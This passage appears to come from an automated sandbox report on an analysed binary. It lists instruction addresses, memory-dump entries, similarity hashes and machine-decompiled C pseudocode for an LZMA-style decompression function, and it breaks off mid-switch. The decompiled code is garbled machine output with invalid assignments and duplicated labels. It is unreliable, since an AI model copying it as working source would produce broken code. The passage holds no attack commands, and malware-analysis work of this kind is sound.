                                                  0x00406153
                                                  0x00406153
                                                  0x0040615e
                                                  0x00406166
                                                  0x00406169
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ae
                                                  0x004061b4
                                                  0x004061b7
                                                  0x004061c4
                                                  0x004061cc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406183
                                                  0x00406183
                                                  0x00406187
                                                  0x004069d2
                                                  0x00000000
                                                  0x004069d2
                                                  0x00406193
                                                  0x0040619e
                                                  0x0040619e
                                                  0x0040619e
                                                  0x004061a1
                                                  0x004061a4
                                                  0x004061a7
                                                  0x004061ac
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406843
                                                  0x00406843
                                                  0x00406849
                                                  0x0040684f
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x0040688f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061d4
                                                  0x004061d6
                                                  0x004061d9
                                                  0x0040624a
                                                  0x0040624d
                                                  0x00406250
                                                  0x00406257
                                                  0x00406261
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x004061db
                                                  0x004061df
                                                  0x004061e2
                                                  0x004061e4
                                                  0x004061e7
                                                  0x004061ea
                                                  0x004061ec
                                                  0x004061ef
                                                  0x004061f1
                                                  0x004061f6
                                                  0x004061f9
                                                  0x004061fc
                                                  0x00406200
                                                  0x00406207
                                                  0x0040620a
                                                  0x00406211
                                                  0x00406215
                                                  0x0040621d
                                                  0x0040621d
                                                  0x0040621d
                                                  0x00406217
                                                  0x00406217
                                                  0x00406217
                                                  0x0040620c
                                                  0x0040620c
                                                  0x0040620c
                                                  0x00406221
                                                  0x00406224
                                                  0x00406242
                                                  0x00406244
                                                  0x00000000
                                                  0x00406226
                                                  0x00406226
                                                  0x00406229
                                                  0x0040622c
                                                  0x0040622f
                                                  0x00406231
                                                  0x00406231
                                                  0x00406231
                                                  0x00406234
                                                  0x00406237
                                                  0x00406239
                                                  0x0040623a
                                                  0x0040623d
                                                  0x00000000
                                                  0x0040623d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004064dd
                                                  0x004064e1
                                                  0x00406504
                                                  0x00406507
                                                  0x0040650a
                                                  0x00406514
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064e6
                                                  0x004064e9
                                                  0x004064ec
                                                  0x004064f9
                                                  0x004064fc
                                                  0x004064fc
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00000000
                                                  0x00406520
                                                  0x00406524
                                                  0x00000000
                                                  0x00000000
                                                  0x0040652a
                                                  0x0040652e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406534
                                                  0x00406536
                                                  0x0040653a
                                                  0x0040653a
                                                  0x0040653d
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x00406591
                                                  0x00406595
                                                  0x0040659c
                                                  0x0040659f
                                                  0x004065a2
                                                  0x004065ac
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00406840
                                                  0x00406597
                                                  0x00000000
                                                  0x00000000
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065c3
                                                  0x004065c6
                                                  0x004065c9
                                                  0x004065be
                                                  0x004065be
                                                  0x004065be
                                                  0x004065cc
                                                  0x004065cf
                                                  0x004065d2
                                                  0x004065d2
                                                  0x004065d5
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e5
                                                  0x004065ea
                                                  0x00000000
                                                  0x00000000
                                                  0x00406678
                                                  0x00406678
                                                  0x0040667c
                                                  0x00406a1a
                                                  0x00000000
                                                  0x00406a1a
                                                  0x00406682
                                                  0x00406685
                                                  0x00406688
                                                  0x0040668c
                                                  0x0040668f
                                                  0x00406695
                                                  0x00406697
                                                  0x00406697
                                                  0x00406697
                                                  0x0040669a
                                                  0x0040669d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040626d
                                                  0x0040626d
                                                  0x00406271
                                                  0x004069de
                                                  0x00000000
                                                  0x004069de
                                                  0x00406277
                                                  0x0040627a
                                                  0x0040627d
                                                  0x00406281
                                                  0x00406284
                                                  0x0040628a
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406292
                                                  0x00406295
                                                  0x00406298
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x004062a4
                                                  0x00000000
                                                  0x00000000
                                                  0x004062aa
                                                  0x004062aa
                                                  0x004062ae
                                                  0x004062b1
                                                  0x004062b4
                                                  0x004062b7
                                                  0x004062ba
                                                  0x004062bb
                                                  0x004062be
                                                  0x004062c0
                                                  0x004062c6
                                                  0x004062c9
                                                  0x004062cc
                                                  0x004062cf
                                                  0x004062d2
                                                  0x004062d5
                                                  0x004062d8
                                                  0x004062f4
                                                  0x004062f7
                                                  0x004062fa
                                                  0x004062fd
                                                  0x00406304
                                                  0x00406308
                                                  0x0040630a
                                                  0x0040630e
                                                  0x004062da
                                                  0x004062da
                                                  0x004062de
                                                  0x004062e6
                                                  0x004062eb
                                                  0x004062ed
                                                  0x004062ef
                                                  0x004062ef
                                                  0x00406311
                                                  0x00406318
                                                  0x0040631b
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406326
                                                  0x00406326
                                                  0x0040632a
                                                  0x004069ea
                                                  0x00000000
                                                  0x004069ea
                                                  0x00406330
                                                  0x00406333
                                                  0x00406336
                                                  0x0040633a
                                                  0x0040633d
                                                  0x00406343
                                                  0x00406345
                                                  0x00406345
                                                  0x00406345
                                                  0x00406348
                                                  0x0040634b
                                                  0x0040634b
                                                  0x0040634b
                                                  0x00406351
                                                  0x00000000
                                                  0x00000000
                                                  0x00406353
                                                  0x00406356
                                                  0x00406359
                                                  0x0040635c
                                                  0x0040635f
                                                  0x00406362
                                                  0x00406365
                                                  0x00406368
                                                  0x0040636b
                                                  0x0040636e
                                                  0x00406371
                                                  0x00406389
                                                  0x0040638c
                                                  0x0040638f
                                                  0x00406392
                                                  0x00406392
                                                  0x00406395
                                                  0x00406399
                                                  0x0040639b
                                                  0x00406373
                                                  0x00406373
                                                  0x0040637b
                                                  0x00406380
                                                  0x00406382
                                                  0x00406384
                                                  0x00406384
                                                  0x0040639e
                                                  0x004063a5
                                                  0x004063a8
                                                  0x00000000
                                                  0x004063aa
                                                  0x00000000
                                                  0x004063aa
                                                  0x004063a8
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x00000000
                                                  0x00000000
                                                  0x004063ea
                                                  0x004063ea
                                                  0x004063ee
                                                  0x004069f6
                                                  0x00000000
                                                  0x004069f6
                                                  0x004063f4
                                                  0x004063f7
                                                  0x004063fa
                                                  0x004063fe
                                                  0x00406401
                                                  0x00406407
                                                  0x00406409
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640c
                                                  0x0040640f
                                                  0x0040640f
                                                  0x00406415
                                                  0x004063b3
                                                  0x004063b3
                                                  0x004063b6
                                                  0x00000000
                                                  0x004063b6
                                                  0x00406417
                                                  0x00406417
                                                  0x0040641a
                                                  0x0040641d
                                                  0x00406420
                                                  0x00406423
                                                  0x00406426
                                                  0x00406429
                                                  0x0040642c
                                                  0x0040642f
                                                  0x00406432
                                                  0x00406435
                                                  0x0040644d
                                                  0x00406450
                                                  0x00406453
                                                  0x00406456
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645d
                                                  0x0040645f
                                                  0x00406437
                                                  0x00406437
                                                  0x0040643f
                                                  0x00406444
                                                  0x00406446
                                                  0x00406448
                                                  0x00406448
                                                  0x00406462
                                                  0x00406469
                                                  0x0040646c
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x004066fb
                                                  0x004066fb
                                                  0x004066ff
                                                  0x00406a26
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406705
                                                  0x00406708
                                                  0x0040670b
                                                  0x0040670f
                                                  0x00406712
                                                  0x00406718
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671d
                                                  0x00000000
                                                  0x00000000
                                                  0x004064cb
                                                  0x004064cb
                                                  0x004064ce
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00000000
                                                  0x0040680a
                                                  0x0040680e
                                                  0x00406830
                                                  0x00406833
                                                  0x0040683d
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00406840
                                                  0x00406810
                                                  0x00406813
                                                  0x00406817
                                                  0x0040681a
                                                  0x0040681a
                                                  0x0040681d
                                                  0x00000000
                                                  0x00000000
                                                  0x004068c7
                                                  0x004068cb
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068f0
                                                  0x004068f7
                                                  0x004068fe
                                                  0x004068fe
                                                  0x00000000
                                                  0x004068fe
                                                  0x004068cd
                                                  0x004068d0
                                                  0x004068d3
                                                  0x004068d6
                                                  0x004068dd
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x00000000
                                                  0x00000000
                                                  0x004069b8
                                                  0x004069bb
                                                  0x004068bc
                                                  0x00000000
                                                  0x00000000
                                                  0x004065f2
                                                  0x004065f4
                                                  0x004065fb
                                                  0x004065fc
                                                  0x004065fe
                                                  0x00406601
                                                  0x00000000
                                                  0x00000000
                                                  0x00406609
                                                  0x0040660c
                                                  0x0040660f
                                                  0x00406611
                                                  0x00406613
                                                  0x00406613
                                                  0x00406614
                                                  0x00406617
                                                  0x0040661e
                                                  0x00406621
                                                  0x0040662f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406905
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406914
                                                  0x00406914
                                                  0x00406918
                                                  0x00406a50
                                                  0x00000000
                                                  0x00406a50
                                                  0x0040691e
                                                  0x00406921
                                                  0x00406924
                                                  0x00406928
                                                  0x0040692b
                                                  0x00406931
                                                  0x00406933
                                                  0x00406933
                                                  0x00406933
                                                  0x00406936
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x0040693c
                                                  0x0040693c
                                                  0x00406940
                                                  0x004069a0
                                                  0x004069a3
                                                  0x004069a8
                                                  0x004069a9
                                                  0x004069ab
                                                  0x004069ad
                                                  0x004069b0
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00000000
                                                  0x004068c2
                                                  0x004068bc
                                                  0x00406942
                                                  0x00406948
                                                  0x0040694b
                                                  0x0040694e
                                                  0x00406951
                                                  0x00406954
                                                  0x00406957
                                                  0x0040695a
                                                  0x0040695d
                                                  0x00406960
                                                  0x00406963
                                                  0x0040697c
                                                  0x0040697f
                                                  0x00406982
                                                  0x00406985
                                                  0x00406989
                                                  0x0040698b
                                                  0x0040698b
                                                  0x0040698c
                                                  0x0040698f
                                                  0x00406965
                                                  0x00406965
                                                  0x0040696d
                                                  0x00406972
                                                  0x00406974
                                                  0x00406977
                                                  0x00406977
                                                  0x00406992
                                                  0x00406999
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x00406637
                                                  0x0040663a
                                                  0x00406670
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a3
                                                  0x004067a3
                                                  0x004067a6
                                                  0x004067a8
                                                  0x00406a32
                                                  0x00000000
                                                  0x00406a32
                                                  0x004067ae
                                                  0x004067b1
                                                  0x00000000
                                                  0x00000000
                                                  0x004067b7
                                                  0x004067bb
                                                  0x004067be
                                                  0x004067be
                                                  0x004067be
                                                  0x00000000
                                                  0x004067be
                                                  0x0040663c
                                                  0x0040663e
                                                  0x00406640
                                                  0x00406642
                                                  0x00406645
                                                  0x00406646
                                                  0x00406648
                                                  0x0040664a
                                                  0x0040664d
                                                  0x00406650
                                                  0x00406666
                                                  0x0040666b
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x004066d3
                                                  0x004066d5
                                                  0x004066dc
                                                  0x004066df
                                                  0x004066e2
                                                  0x004066e2
                                                  0x004066e7
                                                  0x004066e7
                                                  0x004066e9
                                                  0x004066ec
                                                  0x004066f3
                                                  0x004066f6
                                                  0x00406723
                                                  0x00406723
                                                  0x00406726
                                                  0x00406729
                                                  0x0040679d
                                                  0x0040679d
                                                  0x0040679d
                                                  0x00000000
                                                  0x0040679d
                                                  0x0040672b
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406740
                                                  0x00406743
                                                  0x00406746
                                                  0x00406749
                                                  0x0040674c
                                                  0x00406765
                                                  0x00406767
                                                  0x0040676a
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406773
                                                  0x00406775
                                                  0x00406777
                                                  0x0040677a
                                                  0x0040677c
                                                  0x0040677f
                                                  0x00406783
                                                  0x00406785
                                                  0x00406785
                                                  0x00406786
                                                  0x00406789
                                                  0x0040678c
                                                  0x0040674e
                                                  0x0040674e
                                                  0x00406756
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00406760
                                                  0x0040678f
                                                  0x00406796
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00000000
                                                  0x00406798
                                                  0x00000000
                                                  0x00406798
                                                  0x00406796
                                                  0x004066a9
                                                  0x004066ac
                                                  0x004066ae
                                                  0x004066b1
                                                  0x004066b4
                                                  0x004066b7
                                                  0x004066b9
                                                  0x004066bc
                                                  0x004066bf
                                                  0x004066bf
                                                  0x004066c2
                                                  0x004066c2
                                                  0x004066c5
                                                  0x004066cc
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x00000000
                                                  0x004066ce
                                                  0x00000000
                                                  0x004066ce
                                                  0x004066cc
                                                  0x00406652
                                                  0x00406655
                                                  0x00406657
                                                  0x0040665a
                                                  0x00000000
                                                  0x00000000
                                                  0x004063b9
                                                  0x004063b9
                                                  0x004063bd
                                                  0x00406a02
                                                  0x00000000
                                                  0x00406a02
                                                  0x004063c3
                                                  0x004063c6
                                                  0x004063c9
                                                  0x004063cc
                                                  0x004063cf
                                                  0x004063d2
                                                  0x004063d5
                                                  0x004063d7
                                                  0x004063da
                                                  0x004063dd
                                                  0x004063e0
                                                  0x004063e2
                                                  0x004063e2
                                                  0x004063e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00406544
                                                  0x00406544
                                                  0x00406548
                                                  0x00406a0e
                                                  0x00000000
                                                  0x00406a0e
                                                  0x0040654e
                                                  0x00406551
                                                  0x00406554
                                                  0x00406557
                                                  0x00406559
                                                  0x00406559
                                                  0x00406559
                                                  0x0040655c
                                                  0x0040655f
                                                  0x00406562
                                                  0x00406565
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656c
                                                  0x0040656e
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406571
                                                  0x00406574
                                                  0x00406577
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657d
                                                  0x0040657f
                                                  0x0040657f
                                                  0x00000000
                                                  0x00000000
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c5
                                                  0x00000000
                                                  0x00000000
                                                  0x004067cb
                                                  0x004067ce
                                                  0x004067d1
                                                  0x004067d4
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d9
                                                  0x004067dc
                                                  0x004067df
                                                  0x004067e2
                                                  0x004067e5
                                                  0x004067e8
                                                  0x004067e9
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f1
                                                  0x004067f4
                                                  0x004067f7
                                                  0x004067fa
                                                  0x004067fe
                                                  0x00406800
                                                  0x00406803
                                                  0x00000000
                                                  0x00406805
                                                  0x00406582
                                                  0x00406582
                                                  0x00000000
                                                  0x00406582
                                                  0x00406803
                                                  0x00406a38
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00406a6f
                                                  0x00406a6f
                                                  0x00000000
                                                  0x00406a6f
                                                  0x004068bc
                                                  0x00406843
                                                  0x00406840
                                                  0x00000000
                                                  0x00406477

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                                  • Instruction ID: ed496f49c15cb1a0cee1f91230a4d4bd76d3fd25087baa69d2252d5f7e71f344
                                                  • Opcode Fuzzy Hash: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                                  • Instruction Fuzzy Hash: 30713271E00228CFDF28DFA8C8547ADBBB1FB44305F15806AD906BB281D7785A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406591, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E00406591() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
